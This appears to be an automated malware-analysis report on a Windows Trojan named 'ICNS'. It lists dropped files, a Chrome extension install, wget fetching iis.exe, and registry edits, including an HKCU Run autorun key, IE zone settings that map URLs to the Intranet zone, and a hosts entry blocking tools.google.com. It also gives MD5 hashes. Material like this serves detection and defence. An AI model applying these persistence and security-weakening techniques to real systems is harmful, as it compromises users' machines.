%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en_GB\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ro\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fr\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_128.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hu\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\el (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\tr (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\css\craw_window.css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\th (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\bg\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fi\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\et (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nb\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\vi\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_metadata (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ko (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ja (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_BR (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es_419\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\uk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\el\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\bg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_hover.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\it\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Preferences~RF14e56d.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fil (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ru\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_metadata\verified_contents.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\CURRENT~RF149180.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hi\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Local State~RF14e34a.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lv\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ro (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sl\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en_GB (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_window.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Local State~RF1507ba.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\tr\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\et\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_CN (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_maximize.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ru (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fil\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hr (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_pressed.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\flapper.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ja\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sv (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_PT\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sr (0 bytes)

The process chrome.exe:2468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es\messages.json (590 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hr\messages.json (526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_metadata\verified_contents.json (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hi\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es_419\messages.json (548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\css\craw_window.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lv\messages.json (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_background.js (12376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fi\messages.json (602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nb\messages.json (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_window.js (14776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\html\craw_window.html (810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_BR\messages.json (560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\cs\messages.json (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\et\messages.json (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ca\messages.json (567 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\el\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\id\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fil\messages.json (549 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\de\messages.json (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sk\messages.json (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lt\messages.json (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\da\messages.json (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en_GB\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_16.png (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ro\messages.json (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fr\messages.json (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\flapper.gif (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_128.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\it\messages.json (487 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_PT\messages.json (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hu\messages.json (667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ru\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pl\messages.json (603 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_CN\messages.json (641 bytes)

The process chrome.exe:2420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SHKE86ZM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\INTYDBJO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SDJ7K3RV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GV4HH7PU\desktop.ini (67 bytes)

The process wget.exe:2000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\iis.exe (2721720 bytes)

The process %original file name%.exe:668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpffplug.zip (768 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\ICNS100.exe (77149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\cin.exe (58092 bytes)

Registry activity

The process cin.exe:1396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 DD A7 14 42 A2 6D 31 E5 CD A3 7B BC 07 D7 7D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS]
"wget.exe" = "wget"
"iis.exe" = "iis"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser]
"Chrome.exe" = "Google Chrome"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process iis.exe:448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC BD AD 55 8A 9C D5 52 54 EF 2E 7B 9F BC 54 04"

The process chrome.exe:876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 8E C0 30 83 59 A0 C6 BF 9B 43 D4 6E DB 46 CF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"experiment_labels" = "CrVar1=3300140|Wed, 19 Aug 2016 04:26:40 GMT;CrVar2=3300073|Wed, 19 Aug 2016 04:26:40 GMT;CrVar3=3300120|Wed, 19 Aug 2016 04:26:40 GMT;CrVar4=3300133|Wed, 19 Aug 2016 04:26:40 GMT;CrVar5=3300106|Wed, 19 Aug 2016 04:26:40 GMT;CrVar6=3300135|Wed, 19 Aug 2016 04:26:40 GMT"
"lastrun" = "13084431995089875"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process chrome.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 D7 76 31 AD 45 BE 64 DF 74 78 53 B5 09 5E 0C"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 FE 50 AE 6F E5 7C F9 CB 33 F7 7A 3D 2F 81 48"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 A9 6D CE A0 07 3E C6 E0 2B 48 F8 70 E7 FC F7"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 58 08 6B 27 3F A7 42 F7 C0 E4 C6 FA 84 A4 8D"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:2068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 AE 06 B0 9E 0A F1 64 FF E1 34 A3 4F B6 97 0D"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:2420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 17 86 3B 41 BF DC F5 57 7B EE 59 B9 0B 94 A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process chrome.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 19 80 CC BF 4A 51 81 85 4B 18 E6 54 A8 69 2F"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process chrome.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 7B 89 68 EF F8 DC EC AA F8 83 23 18 75 2D 55"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "1"

The process wget.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 74 59 EC 16 19 80 DF FE 0D 57 78 21 7F 68 30"

The process %original file name%.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 17 B3 AF 6C 2B 37 E5 C9 5C D6 91 98 11 BC 21"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\ICNS\BT]
"ID" = "MG0b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS]
"CIN.exe" = "WindowsFormsApplication1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ICNS" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\ICNS100.exe"

Dropped PE files

MD5 File path
75aa64db6faee798320c5afc217f81bf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\ICNS\ICNS100.exe
1a790f7732da9d944a3045f4d8ce99c5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\ICNS\cin.exe
f98d5a7924143f6e687dd92d9af8f3a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\ICNS\wget.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 793 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 tools.google.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ICNS
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2015
Legal Trademarks:
Original Filename: ICNS.exe
Internal Name: ICNS.exe
File Version: 1.0.0.0
File Description: ICNS
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 1840704 1841152 4.14234 a425195136be0533c21f32efc0fb90ed
